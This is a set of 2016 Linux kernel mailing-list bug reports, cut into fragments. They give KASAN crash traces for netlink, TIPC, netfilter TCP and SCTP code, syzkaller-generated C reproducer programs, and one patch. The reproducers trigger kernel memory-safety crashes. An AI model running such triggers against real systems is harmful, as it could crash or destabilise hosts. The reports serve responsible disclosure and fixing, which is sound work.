? copy_pte_range mm/memory.c:945 [< inline >] ? copy_pmd_range mm/memory.c:1003 [< inline >] ? copy_pud_range mm/memory.c:1025 [] ? copy_page_range+0xa69/0x19d0 mm/memory.c:1087 [< inline >] ? copy_pte_range mm/memory.c:945 [< inline >] ? copy_pmd_range mm/memory.c:1003 [< inline >] ? copy_pud_range mm/memory.c:1025 [] ? copy_page_range+0xa4a/0x19d0 mm/memory.c:1087 [< inline >] ? rb_insert_augmented include/linux/rbtree_augmented.h:60 [< inline >] ? __anon_vma_interval_tree_insert mm/interval_tree.c:72 [] ? anon_vma_interval_tree_insert+0x233/0x2d0 mm/interval_tree.c:83 [] ? vm_iomap_memory+0x130/0x130 mm/memory.c:1836 [< inline >] ? vma_rb_insert include/linux/rbtree_augmented.h:60 [] ? __vma_link_rb+0x445/0x5d0 mm/mmap.c:531 [< inline >] dup_mmap kernel/fork.c:513 [< inline >] dup_mm kernel/fork.c:937 [< inline >] copy_mm kernel/fork.c:991 [] copy_process.part.37+0x468d/0x5a50 kernel/fork.c:1456 [] ? __cleanup_sighand+0x50/0x50 kernel/fork.c:1105 [< inline >] copy_process kernel/fork.c:1282 [] _do_fork+0x1a9/0xcd0 kernel/fork.c:1731 [] ? fork_idle+0x110/0x110 include/linux/list.h:601 [] ? __fsnotify_parent+0x5e/0x2b0 fs/notify/fsnotify.c:98 [< inline >] ? inc_syscr include/linux/sched.h:3178 [] ? vfs_read+0x223/0x310 fs/read_write.c:499 [< inline >] SYSC_clone kernel/fork.c:1840 [] SyS_clone+0x37/0x50 kernel/fork.c:1834 [] ? ptregs_sys_rt_sigreturn+0x10/0x10 arch/x86/include/generated/asm/syscalls_64.h:16 [] do_syscall_64+0x1ad/0x4b0 arch/x86/entry/common.c:350 [] ? sys_vfork+0x30/0x30 kernel/fork.c:1813 [] entry_SYSCALL64_slow_path+0x25/0x25 arch/x86/entry/entry_64.S:248 Memory state around the buggy address: 880038027880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880038027900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880038027980: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb ^ 880038027a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880038027a80: fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc == Best Regards, Baozeng Ding
BUG: use-after-free in netlink_dump
sg_nosec net/socket.c:612 [] ? ___sys_sendmsg+0x860/0x860 net/socket.c:1943 [< inline >] ? rcu_read_unlock include/linux/rcupdate.h:922 [] ? __fget+0x20c/0x3b0 fs/file.c:712 [< inline >] ? rcu_lock_release include/linux/rcupdate.h:491 [< inline >] ? rcu_read_unlock include/linux/rcupdate.h:926 [] ? __fget+0x235/0x3b0 fs/file.c:712 [] ? __fget+0x47/0x3b0 fs/file.c:696 [] ? __fget_light+0xa1/0x1f0 fs/file.c:759 [] ? __fdget+0x18/0x20 fs/file.c:764 [] ? sockfd_lookup_light+0xf8/0x1f0 net/socket.c:463 [] __sys_recvmsg+0xce/0x170 net/socket.c:2150 [] ? SyS_sendmmsg+0x60/0x60 net/socket.c:2064 [< inline >] SYSC_recvmsg net/socket.c:2162 [] SyS_recvmsg+0x2d/0x50 net/socket.c:2157 [] entry_SYSCALL_64_fastpath+0x23/0xc1 arch/x86/entry/entry_64.S:207 Memory state around the buggy address: 880036ae7880: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 880036ae7900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >880036ae7980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ 880036ae7a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb 880036ae7a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb == Best Regards, Baozeng Ding
Re: BUG: net/tipc: NULL-ptr dereference in tipc_nl_publ_dump
On 2016/5/15 1:13, Eric Dumazet wrote: On Sat, 2016-05-14 at 23:22 +0800, Baozeng Ding wrote: Hello all, The following program triggers NULL-ptr dereference in tipc_nl_publ_dump. The kernel version is 4.6.0-rc7+ (on May 13 commit 1410b74e4061e05a5d2bffb1f99829efce27c8a9). Thanks. -- netlink: 1 bytes leftover after parsing attributes in process `syz-executor'. kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory accessgeneral protection fault: [#1] SMP KASAN Modules linked in: CPU: 2 PID: 1346 Comm: syz-executor Not tainted 4.6.0-rc7+ #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 task: 88001eb1dd40 ti: 88001bd98000 task.ti: 88001bd98000 RIP: 0010:[] [] tipc_nl_publ_dump+0xa39/0xdf0 RSP: 0018:88001bd9f428 EFLAGS: 00010246 RAX: dc00 RBX: 88003562efc0 RCX: c900012c7000 RDX: RSI: 880036215d98 RDI: 8800196fda98 RBP: 88001bd9f678 R08: 0001 R09: R10: ed00032dfb5a R11: 11131255 R12: R13: 88002d0f8040 R14: R15: 88002ea220a8 FS: 7f0b7c70f700() GS:88003620() knlGS: CS: 0010 DS: ES: CR0: 80050033 CR2: 20b5d7f2 CR3: 301fe000 CR4: 06e0 Stack: 88002ea22100 88002ea220f8 88002ea220f0 1bd9f520 1100037b3e92 88002ea220b0 88001bd9f498 815bcc6e 880036223e40 88002fd60008 Call Trace: [] genl_lock_dumpit+0x68/0x90 net/netlink/genetlink.c:517 [] netlink_dump+0x36a/0xa40 net/netlink/af_netlink.c:2108 [] __netlink_dump_start+0x4e9/0x760 net/netlink/af_netlink.c:2196 [] genl_family_rcv_msg+0xa91/0xc30 net/netlink/genetlink.c:584 [] genl_rcv_msg+0x1ab/0x260 net/netlink/genetlink.c:658 [] netlink_rcv_skb+0x29c/0x390 net/netlink/af_netlink.c:2277 [] genl_rcv+0x28/0x40 net/netlink/genetlink.c:669 [< inline >] netlink_unicast_kernel net/netlink/af_netlink.c:1214 [] netlink_unicast+0x5a2/0x890 net/netlink/af_netlink.c:1240 [] netlink_sendmsg+0x981/0xcb0 net/netlink/af_netlink.c:1786 [< inline >] sock_sendmsg_nosec net/socket.c:612 [] sock_sendmsg+0xca/0x110 net/socket.c:622 [] ___sys_sendmsg+0x728/0x860 net/socket.c:1946 [] __sys_sendmsg+0xd1/0x170 net/socket.c:1980 [< inline >] SYSC_sendmsg net/socket.c:1991 [] SyS_sendmsg+0x2d/0x50 net/socket.c:1987 [] entry_SYSCALL_64_fastpath+0x23/0xc1 arch/x86/entry/entry_64.S:207 Code: df 49 8d 7e 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 df 01 00 00 4d 8b 76 10 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6 14 02 4c 89 f0 83 e0 07 83 c0 01 38 d0 7c 08 84 d2 0f 85 RIP [] tipc_nl_publ_dump+0xa39/0xdf0 net/tipc/socket.c:2810 RSP ---[ end trace e8355fded2057a4f ]--- Probable fix : diff --git a/net/tipc/socket.c b/net/tipc/socket.c index 3eeb50a27b89..5f80d3fa9c85 100644 --- a/net/tipc/socket.c +++ b/net/tipc/socket.c @@ -2807,6 +2807,9 @@ int tipc_nl_publ_dump(struct sk_buff *skb, struct netlink_callback *cb) if (err) return err; + if (!attrs[TIPC_NLA_SOCK]) + return -EINVAL; + err = nla_parse_nested(sock, TIPC_NLA_SOCK_MAX, attrs[TIPC_NLA_SOCK], tipc_nl_sock_policy); Yes. I tested with the patch. It works. Thanks.
BUG: net/tipc: NULL-ptr dereference in tipc_nl_publ_dump
Hello all, The following program triggers NULL-ptr dereference in tipc_nl_publ_dump. The kernel version is 4.6.0-rc7+ (on May 13 commit 1410b74e4061e05a5d2bffb1f99829efce27c8a9). Thanks. -- netlink: 1 bytes leftover after parsing attributes in process `syz-executor'. kasan: CONFIG_KASAN_INLINE enabled kasan: GPF could be caused by NULL-ptr deref or user memory accessgeneral protection fault: [#1] SMP KASAN Modules linked in: CPU: 2 PID: 1346 Comm: syz-executor Not tainted 4.6.0-rc7+ #2 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 task: 88001eb1dd40 ti: 88001bd98000 task.ti: 88001bd98000 RIP: 0010:[] [] tipc_nl_publ_dump+0xa39/0xdf0 RSP: 0018:88001bd9f428 EFLAGS: 00010246 RAX: dc00 RBX: 88003562efc0 RCX: c900012c7000 RDX: RSI: 880036215d98 RDI: 8800196fda98 RBP: 88001bd9f678 R08: 0001 R09: R10: ed00032dfb5a R11: 11131255 R12: R13: 88002d0f8040 R14: R15: 88002ea220a8 FS: 7f0b7c70f700() GS:88003620() knlGS: CS: 0010 DS: ES: CR0: 80050033 CR2: 20b5d7f2 CR3: 301fe000 CR4: 06e0 Stack: 88002ea22100 88002ea220f8 88002ea220f0 1bd9f520 1100037b3e92 88002ea220b0 88001bd9f498 815bcc6e 880036223e40 88002fd60008 Call Trace: [] genl_lock_dumpit+0x68/0x90 net/netlink/genetlink.c:517 [] netlink_dump+0x36a/0xa40 net/netlink/af_netlink.c:2108 [] __netlink_dump_start+0x4e9/0x760 net/netlink/af_netlink.c:2196 [] genl_family_rcv_msg+0xa91/0xc30 net/netlink/genetlink.c:584 [] genl_rcv_msg+0x1ab/0x260 net/netlink/genetlink.c:658 [] netlink_rcv_skb+0x29c/0x390 net/netlink/af_netlink.c:2277 [] genl_rcv+0x28/0x40 net/netlink/genetlink.c:669 [< inline >] netlink_unicast_kernel net/netlink/af_netlink.c:1214 [] netlink_unicast+0x5a2/0x890 net/netlink/af_netlink.c:1240 [] netlink_sendmsg+0x981/0xcb0 net/netlink/af_netlink.c:1786 [< inline >] sock_sendmsg_nosec net/socket.c:612 [] sock_sendmsg+0xca/0x110 net/socket.c:622 [] ___sys_sendmsg+0x728/0x860 net/socket.c:1946 [] __sys_sendmsg+0xd1/0x170 net/socket.c:1980 [< inline >] SYSC_sendmsg net/socket.c:1991 [] SyS_sendmsg+0x2d/0x50 net/socket.c:1987 [] entry_SYSCALL_64_fastpath+0x23/0xc1 arch/x86/entry/entry_64.S:207 Code: df 49 8d 7e 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85 df 01 00 00 4d 8b 76 10 48 b8 00 00 00 00 00 fc ff df 4c 89 f2 48 c1 ea 03 <0f> b6 14 02 4c 89 f0 83 e0 07 83 c0 01 38 d0 7c 08 84 d2 0f 85 RIP [] tipc_nl_publ_dump+0xa39/0xdf0 net/tipc/socket.c:2810 RSP ---[ end trace e8355fded2057a4f ]--- #include #include #include #include #include #include int main() { mmap((void *)0x2000ul, 0xd7f000ul, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0); int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC); *(uint64_t*)0x2363 = (uint64_t)0x0; *(uint32_t*)0x236b = (uint32_t)0x0; *(uint64_t*)0x2373 = (uint64_t)0x20001ff0; *(uint64_t*)0x237b = (uint64_t)0x1; *(uint64_t*)0x2383 = (uint64_t)0x20aab000; *(uint64_t*)0x238b = (uint64_t)0x5; *(uint32_t*)0x2393 = (uint32_t)0x81; *(uint64_t*)0x20001ff0 = (uint64_t)0x20001000; *(uint64_t*)0x20001ff8 = (uint64_t)0x3e; *(uint32_t*)0x20001000 = (uint32_t)0x15; *(uint16_t*)0x20001004 = (uint16_t)0x22; *(uint16_t*)0x20001006 = (uint16_t)0x71b; *(uint32_t*)0x20001008 = (uint32_t)0x2; *(uint32_t*)0x2000100c = (uint32_t)0x2; *(uint8_t*)0x20001010 = (uint8_t)0x7; *(uint8_t*)0x20001011 = (uint8_t)0x8; *(uint8_t*)0x20001012 = (uint8_t)0xa0ad8f89e1b1651f; *(uint8_t*)0x20001013 = (uint8_t)0x44; *(uint8_t*)0x20001014 = (uint8_t)0x1; *(uint32_t*)0x20001015 = (uint32_t)0x15; *(uint16_t*)0x20001019 = (uint16_t)0xfffa; *(uint16_t*)0x2000101b = (uint16_t)0x100; *(uint32_t*)0x2000101d = (uint32_t)0x1ff; *(uint32_t*)0x20001021 = (uint32_t)0x4; *(uint8_t*)0x20001025 = (uint8_t)0x3; *(uint8_t*)0x20001026 = (uint8_t)0x7; *(uint8_t*)0x20001027 = (uint8_t)0x4; *(uint8_t*)0x20001028 = (uint8_t)0x2; *(uint8_t*)0x20001029 = (uint8_t)0x9; *(uint32_t*)0x2000102a = (uint32_t)0x14; *(uint16_t*)0x2000102e = (uint16_t)0x1; *(uint16_t*)0x20001030 = (uint16_t)0x400; *(uint32_t*)0x20001032 = (uint32_t)0x8000; *(uint32_t*)0x20001036 = (uint32_t)0x60; *(uint8_t*)0x2000103a = (uint8_t)0x1; *(uint8_t*)0x2000103b = (uint8_t)0x1ff; *(uint8_t*)0x2000103c = (uint8_t)0x3ff; *(uint8_t
Re: BUG: net/netfilter: KASAN: stack-out-of-bounds in tcp_packet
On 2016/3/28 10:35, Baozeng Ding wrote: On 2016/3/28 6:25, Jozsef Kadlecsik wrote: On Mon, 28 Mar 2016, Jozsef Kadlecsik wrote: On Sun, 27 Mar 2016, Baozeng Ding wrote: The following program triggers stack-out-of-bounds in tcp_packet. The kernel version is 4.5 (on Mar 16 commit 09fd671ccb2475436bd5f597f751ca4a7d177aea). Uncovered with syzkaller. Thanks. == BUG: KASAN: stack-out-of-bounds in tcp_packet+0x4b77/0x51c0 at addr 8800a45df3c8 Read of size 1 by task 0327/11132 page:ea00029177c0 count:0 mapcount:0 mapping: (null) index:0x0 flags: 0x1fffc00() page dumped because: kasan: bad access detected CPU: 1 PID: 11132 Comm: 0327 Tainted: GB 4.5.0+ #12 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 0001 8800a45df148 82945051 8800a45df1d8 8800a45df3c8 0027 0001 8800a45df1c8 81709f88 8800b4f7e3d0 0028 0286 Call Trace: [< inline >] __dump_stack /kernel/lib/dump_stack.c:15 [] dump_stack+0xb3/0x112 /kernel/lib/dump_stack.c:51 [< inline >] print_address_description /kernel/mm/kasan/report.c:150 [] kasan_report_error+0x4f8/0x530 /kernel/mm/kasan/report.c:236 [] ? skb_copy_bits+0x49d/0x6d0 /kernel/net/core/skbuff.c:1675 [< inline >] ? spin_lock_bh /kernel/include/linux/spinlock.h:307 [] ? tcp_packet+0x1c9/0x51c0 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:833 [< inline >] kasan_report /kernel/mm/kasan/report.c:259 [] __asan_report_load1_noabort+0x3e/0x40 /kernel/mm/kasan/report.c:277 [< inline >] ? tcp_sack /kernel/net/netfilter/nf_conntrack_proto_tcp.c:473 [< inline >] ? tcp_in_window /kernel/net/netfilter/nf_conntrack_proto_tcp.c:527 [] ? tcp_packet+0x4b77/0x51c0 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1036 [< inline >] tcp_sack /kernel/net/netfilter/nf_conntrack_proto_tcp.c:473 [< inline >] tcp_in_window /kernel/net/netfilter/nf_conntrack_proto_tcp.c:527 [] tcp_packet+0x4b77/0x51c0 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1036 [] ? memset+0x28/0x30 /kernel/mm/kasan/kasan.c:302 [] ? tcp_new+0x1a4/0xc20 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1122 [< inline >] ? build_report /kernel/include/net/netlink.h:499 [] ? xfrm_send_report+0x426/0x450 /kernel/net/xfrm/xfrm_user.c:3039 [] ? tcp_new+0xc20/0xc20 /kernel/net/netfilter/nf_conntrack_proto_tcp.c:1169 [] ? init_conntrack+0xca/0x9e0 /kernel/net/netfilter/nf_conntrack_core.c:972 [] ? nf_conntrack_alloc+0x40/0x40 /kernel/net/netfilter/nf_conntrack_core.c:903 [] ? tcp_init_net+0x6e0/0x6e0 /kernel/include/net/netfilter/nf_conntrack_l4proto.h:137 [] ? ipv4_get_l4proto+0x262/0x390 /kernel/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c:89 [] ? nf_ct_get_tuple+0xaf/0x190 /kernel/net/netfilter/nf_conntrack_core.c:197 [] nf_conntrack_in+0x8ee/0x1170 /kernel/net/netfilter/nf_conntrack_core.c:1177 [] ? init_conntrack+0x9e0/0x9e0 /kernel/net/netfilter/nf_conntrack_core.c:287 [] ? ipt_do_table+0xa16/0x1260 /kernel/net/ipv4/netfilter/ip_tables.c:423 [] ? trace_hardirqs_on+0xd/0x10 /kernel/kernel/locking/lockdep.c:2635 [] ? __local_bh_enable_ip+0x6b/0xc0 /kernel/kernel/softirq.c:175 [] ? check_entry.isra.4+0x190/0x190 /kernel/net/ipv6/netfilter/ip6_tables.c:594 [] ? ip_reply_glue_bits+0xc0/0xc0 /kernel/net/ipv4/ip_output.c:1530 [] ipv4_conntrack_local+0x14e/0x1a0 /kernel/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c:161 [] ? iptable_raw_hook+0x9d/0x1e0 /kernel/net/ipv4/netfilter/iptable_raw.c:32 [] nf_iterate+0x15d/0x230 /kernel/net/netfilter/core.c:274 [] ? nf_iterate+0x230/0x230 /kernel/net/netfilter/core.c:268 [] nf_hook_slow+0x1ad/0x310 /kernel/net/netfilter/core.c:306 [] ? nf_iterate+0x230/0x230 /kernel/net/netfilter/core.c:268 [] ? nf_iterate+0x230/0x230 /kernel/net/netfilter/core.c:268 [] ? prandom_u32+0x24/0x30 /kernel/lib/random32.c:83 [] ? ip_idents_reserve+0x9f/0xf0 /kernel/net/ipv4/route.c:484 [< inline >] nf_hook_thresh /kernel/include/linux/netfilter.h:187 [< inline >] nf_hook /kernel/include/linux/netfilter.h:197 [] __ip_local_out+0x263/0x3c0 /kernel/net/ipv4/ip_output.c:104 [] ? ip_finish_output+0xd00/0xd00 /kernel/include/net/ip.h:322 [] ? __ip_flush_pending_frames.isra.45+0x2e0/0x2e0 /kernel/net/ipv4/ip_output.c:1337 [] ? __ip_make_skb+0xfe6/0x1610 /kernel/net/ipv4/ip_output.c:1436 [] ip_local_out+0x2d/0x1c0 /kernel/net/ipv4/ip_output.c:113 [] ip_send_skb+0x3c/0xc0 /kernel/net/ipv4/ip_output.c:1443 [] ip_push_pending_frames+0x64/0x80 /kernel/net/ipv4/ip_output.c:1463 [< inline >] rcu_read_unlock /kernel/include/linux/rcupdate.h:922 [] raw_sendmsg+0x17bb/0x25c0 /kernel/net/ieee802154/socket.c:53 [] ? dst_output+0x190/0x190 /kernel/include/net/dst.h:492 [< inline >] ? trace_mm_page_alloc /k
BUG: net/netfilter: KASAN: stack-out-of-bounds in tcp_packet
0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [] ? is_module_text_address+0x10/0x20 /kernel/kernel/module.c:4057 [] ? __kernel_text_address+0x73/0xa0 /kernel/kernel/extable.c:103 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [] ? trace_hardirqs_on+0xd/0x10 /kernel/kernel/locking/lockdep.c:2635 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/kernel/locking/lockdep.c:4104 [< inline >] ? sock_rps_record_flow /kernel/include/net/sock.h:874 [] ? inet_sendmsg+0x73/0x4c0 /kernel/net/ipv4/af_inet.c:729 [< inline >] ? rcu_read_unlock /kernel/include/linux/rcupdate.h:922 [< inline >] ? sock_rps_record_flow_hash /kernel/include/net/sock.h:867 [< inline >] ? sock_rps_record_flow /kernel/include/net/sock.h:874 [] ? inet_sendmsg+0x1fa/0x4c0 /kernel/net/ipv4/af_inet.c:729 [] inet_sendmsg+0x2f5/0x4c0 /kernel/net/ipv4/af_inet.c:736 [< inline >] ? sock_rps_record_flow /kernel/include/net/sock.h:874 [] ? inet_sendmsg+0x73/0x4c0 /kernel/net/ipv4/af_inet.c:729 [] ? inet_recvmsg+0x4a0/0x4a0 /kernel/include/linux/compiler.h:222 [< inline >] sock_sendmsg_nosec /kernel/net/socket.c:611 [] sock_sendmsg+0xca/0x110 /kernel/net/socket.c:621 [] SYSC_sendto+0x208/0x350 /kernel/net/socket.c:1651 [] ? SYSC_connect+0x2e0/0x2e0 /kernel/net/socket.c:1543 [] ? __pmd_alloc+0x350/0x350 /kernel/mm/memory.c:3928 [] ? __do_page_fault+0x2ab/0x8e0 /kernel/arch/x86/mm/fault.c:1184 [] ? __do_page_fault+0x3a0/0x8e0 /kernel/arch/x86/mm/fault.c:1271 [] ? up_read+0x1a/0x40 /kernel/kernel/locking/rwsem.c:79 [] ? __do_page_fault+0x199/0x8e0 /kernel/arch/x86/mm/fault.c:1187 [] SyS_sendto+0x40/0x50 /kernel/net/socket.c:1619 [] entry_SYSCALL_64_fastpath+0x23/0xc1 /kernel/arch/x86/entry/entry_64.S:207 Memory state around the buggy address: 8800a45df280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8800a45df300: f1 f1 f1 f1 00 00 04 f4 f2 f2 f2 f2 00 00 04 f4 8800a45df380: f2 f2 f2 f2 00 00 00 00 00 f4 f4 f4 f3 f3 f3 f3 ^ 8800a45df400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8800a45df480: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 01 f4 f4 f4 == #include #include #include #include #include #include #include #include int main() { mmap((void *)0x2000ul, 0x19000ul, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0); int sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); int sock_dup = dup(sock); memcpy((void*)0x2000b000, "\x11\xaf\x7d\x99\x91\x3c\x87\x34\x85\x18\xc4\xd6\xf2\x30\x0a", 15); *(uint16_t*)0x20002fec = (uint16_t)0x2; *(uint16_t*)0x20002fee = (uint16_t)0x11ab; *(uint32_t*)0x20002ff0 = (uint32_t)0x17f; sendto(sock_dup, (void *)0x2000b000ul, 0xful, 0x8800ul, (struct sockaddr *)0x20002fe4ul, 0x1cul); memcpy((void*)0x2001504f, "\x7e\xb1\x52\x5b\x78\x85\x27\xe7\xcc\x3d\xf5\x18\x1b\xba\xda\x97\x6c\x18\x72\x0c\xd2\x0a\xa6\x77\xb7\x8b\xa2\xd2\x1d\xf0\x6b\xf6\x1a\x27\x6b\x98\x3e\x0b\x49\x8d\x54\x6e\x9e\xbb\x21\x4a\x72\x79\x1f\x82\xaf\x89\x2c\xf6\xd3\xc9\xd7\xed\x18\x29\x4d\x2e\x03\x15\xe2\x03\x14\xd0\xac\xa5\x81\x37\x73\x88\xa9\xf5\x08\xe5\xef\x5b\x56\xb7\x18\x8f\xe6\x19\xea\x91\x82\x23\xdd\x2c\x5c\xa5\xf0\xfc\xd8\xe2\x8b\x91\x48\x70\x24\xed\xae\xf9\x06\xac\xc4\x53\x01\xc3\xf5\xa3\x10\xef\xf1\xa6\x2b\xae\x72\xc7\x1a\x02\xee\x78\xcd\xd1\x7e\x8c\x9c\x1a\x36\xc7\xd4\x7c\x82\x64\xf7\x8b\x5a\xb0\x72\xa8\x87\x3c\xdc\xd0\xba\xfe\x70\x7d\x8c\x23\x78\xad\x7c\x31\x04\xec\xab\x1e\x4c\xee\xae\x84\xd8\x1a\x1d\x85\xa5\x57\xa8\x24\x53\x08\x1c\x4f\xda\x49\xe5\x3a\x99\x8c\x29\xa1\xed\x4b\x42\x7a\x15\x48\x2a\x22\x3b\x81\xfe\x47\x74\xc1\x2f\x64\xcf\x10\xd4\x71\x72\x50\x71\xd7\xf6\xb0\xca\x41\x9a\x5e\x3e\xe4\x31\x19\xd1\x19\x46\x20\x66\x4c\x2f\xea\x76\x17\x2d\x94", 232); *(uint16_t*)0x2001501c = (uint16_t)0xa; *(uint16_t*)0x2001501e = (uint16_t)0x11ab; *(uint32_t*)0x20015020 = (uint32_t)0xbdc; *(uint32_t*)0x20015024 = (uint32_t)0x0; *(uint32_t*)0x20015028 = (uint32_t)0x0; *(uint32_t*)0x2001502c = (uint32_t)0x0; *(uint32_t*)0x20015030 = (uint32_t)0x100; *(uint32_t*)0x20015034 = (uint32_t)0x3; sendto(sock_dup, (void *)0x2001504ful, 0xe8ul, 0x880ul, (struct sockaddr *)0x20015000ul, 0x1cul); return 0; } Best Regards, Baozeng Ding
net/sctp: stack-out-of-bounds in sctp_getsockopt
d4\x3a\x64\x51\x68\x13\x2d\x25\xba\x6d\x3f\x74\x68\x84\x89\x04\xd1\xa6\xe2\x7d\xaf\xfa\xd9\xce\x52\xbe\x6f\xb6\xe3\xff\x92\x35\xa1\x88\x4a\x68\x27\xaa\x25\xf8\xc1\xd5\x3b\xe5\x69\x11\x4f\x75\x4c\xe9\xff\x8b\x86\x53\x20\xb7\x10\xa2\x62\xcc\xc3\x06\x85\xde\x3e\x1c\x5a\x62\x3a\x2d\x0d\x0b\x0c\xb2\xac\x75\x42\x4d\x82\x3f\x7b\xf7\x28\xea\x2d\xff\x42\xa8\xdf\xb3\x49\x1a\xfd\xae\x2c\xd4\x35\x8e\x96\xb3\xe1\x0a\x92\x56\xb7\xde\xe8\x9e\xc3\x9e\x88\x79\xc4\x71\x46\x27\xf4\x9e\x85\xf4\x8f\x1f\x9a\xe5\x7e\x02\x09\x34\x80\x1e\x87\xa8\x9a\xce\xac\xfb\x43\x07\xdf\x15\xe8\x71\x9a\xa3\x80\x18\x1b\x15\xbd\x57\xb6\xc1\x73\x6e\xb1\x28\x3a\x01\xd5\x8e\x15\x85\xbd\x52\xdf\xfa\x64\xaa\x13\x0e\x2f\x64\x05\x11\xce\x79\x8b\xa8\x02\x29\x7f\x72\x0f\x37\x89\xb4\x54\x0b\x09\x02\x75\xc2\x8e\xd7\xcd\x7e\xfb\x4f\x72\xf1\x47\xea\xa2\x2a\xc3\xc4\xe9\x70\xfe\xa5\x80\x88\x21\x33\xcf\x13\x66\x98\x23\x10\x5c\xa4\xbd\xee\xc0\xb4\xdd\xfb\xff\xf2\x38\xab\xca\x36\x62\x35\x84\xe4\x73\x5c\xc7\x3e\x72\x2e\x17\x43\x6f\x85\x45\x4f\x82\x62\x0d\x77\xae\xcb\xe1\x8f\xe8\xf0\x84\x3e\x62\x8b\x70\x2b\x55\xb5\xa7\x13\xcf\xa1\x78\x77\x82\xe2\xb7\x1c\x65\x7f\xb5\x79\x73\x01\x07\xd1\x9f\x45\x6a\xbb\x3d\xbf\xc8\x71\x5b\x9f\x30\xc7\xb9\xb8\x53\x9f\xe1\xba\xb6\x78\x9e\x05\x75\xa3\x55\xb1\x26\x96\xa9\xb2\x82\xce\x81\x5c\x8a\x18\xb3\x4b\x0c\x18\x8c\xf2\x7c\x09\xde\xcb\xcf\x78\x22\x58\xf6\x15\xf6\xf7\x48\xda\x08\x75\xd4\xc1\x20\xc3\x18\x2e\x89\xe8\x5b\x48\xd9\xbc\x1f\xbb\xed\x31\xaf\x12\x4d\xcd\x46\x60\xa0\xef\x0e\x2e\x21\x1d\x2b\x68\x75\xb9\x42\x5e\xd7\xae\x35\x46\xe9\x06\x63\x1d\x3c\xd6\x9c\x14\x3b\x09\x29\x49\x70\xb9\xe1\xe0\x09\x45\x41\x62\x0c\xff\x5a\x77\xbe\x31\xa6\x03\x94\x92\xde\x41\x99\xfa\x68\x99\x74\xbb\x0a\x3d\xac\x9c\x7e\x00\x6b\xcd\xc1\x83\xa7\xc5\x63\xdd\x10\xea\x59\x27\xdc\x02\x98\xd6\x43\x20\x24\x4e\xc0\xdc\xa2\x98\xdf\x3e\xaf\x61\x35\xa0\x95\x3f\x9a\xaa\x7d\xe9\xe9\x0d\xe5\x97\x66\x1a\x9f\xbf\x56\xc8\x37\x84\x18\x2b\xd2\xcd\xd6\xb3\x19\xd8\x4a\x30\x6e\xcb\x99\x1c\xe9\x0f\xdb\xca\x30\xe1\xe2\x90\xba\xb9\x61\x00\xbf\xeb\xad\x6a\xc8\x52\xea\x1a\x92\x05\x0c\x3b\x78\x82\x01\xac\xfd\x88\x6c\xca\xe2\xfb\xe7\x0f\xcc\x75\x9c\x98\x12\x26\xcf\xa6\x80\x02\x35\xdf\x6e\xe1\x11\x1d\xa7\x30\x17\x38\x41\xd9\x81\x55\x1a\x1e\xd1\xfe\x60\xbf\xef\x09\x25\xc0\xdb\x9f\xc4\xc6\x54\x1a\x85\x36\x85\x05\xb3\x9f\x2c\xc5\xcd\x12\x51\xef\xbe\x10\x79\xbf\x11\x00\x47\x0d\x9c\x14\x43\x1a\x46\xea\xd1\x34\x2e\x10\x6b\xa4\x3c\x25\x21\xe3\xb9\x15\x78\x6c\x40\x87\x90\xf7\x93\x5a\x66\x5f\x0a\x76\xff\xc2\xe2\x14\x35\x88\x47\xa1\x33\x5b\x8f\x3d\xc5\x89\xb7\xf9\x8a\x40\xf0\x1e\xc9\x30\xcd\xd8\x96\x41\x78\x58\x97\x49\xc8\x50\x61\x36\x8f\x7e\x44\x41\xc0\x84\xbb\x35\xf0\x63\xa9\xc2\x2a\xbd\xcc\x4b\xab\x8b\x16\x33\xc0\x66\xbf\x47\x62\x9b\xc4\x47\x2d\x68\x83\xca\xe3\x52\x79\xd7\xe0\x61\x80\x15\xf1\x90\x83\xa2\xbb\x4c\xe5\x8b\x50\xc8\x1b\x68\x7b\xee\x57\xdc\x54\xfa\x90\xf1\xf5\xec\x7d\x93\xe0\x80\x74\x06\xbe\xac\xc8\x85\x4d\xe8\xbf\xd3\xdd\x34\x55\xc4\xbf\x2f\x24\x19\xad\x86\x1e\x69\x2b\x6c\x3f\x00\xe8\x4b\xbb\x99\xcf\x17\x99\x00\x9d\x6c\x70\x57\xcc\x35\xee\x07\x87\x25\x8c\x0c\x8b\x9b\x38\x15\xc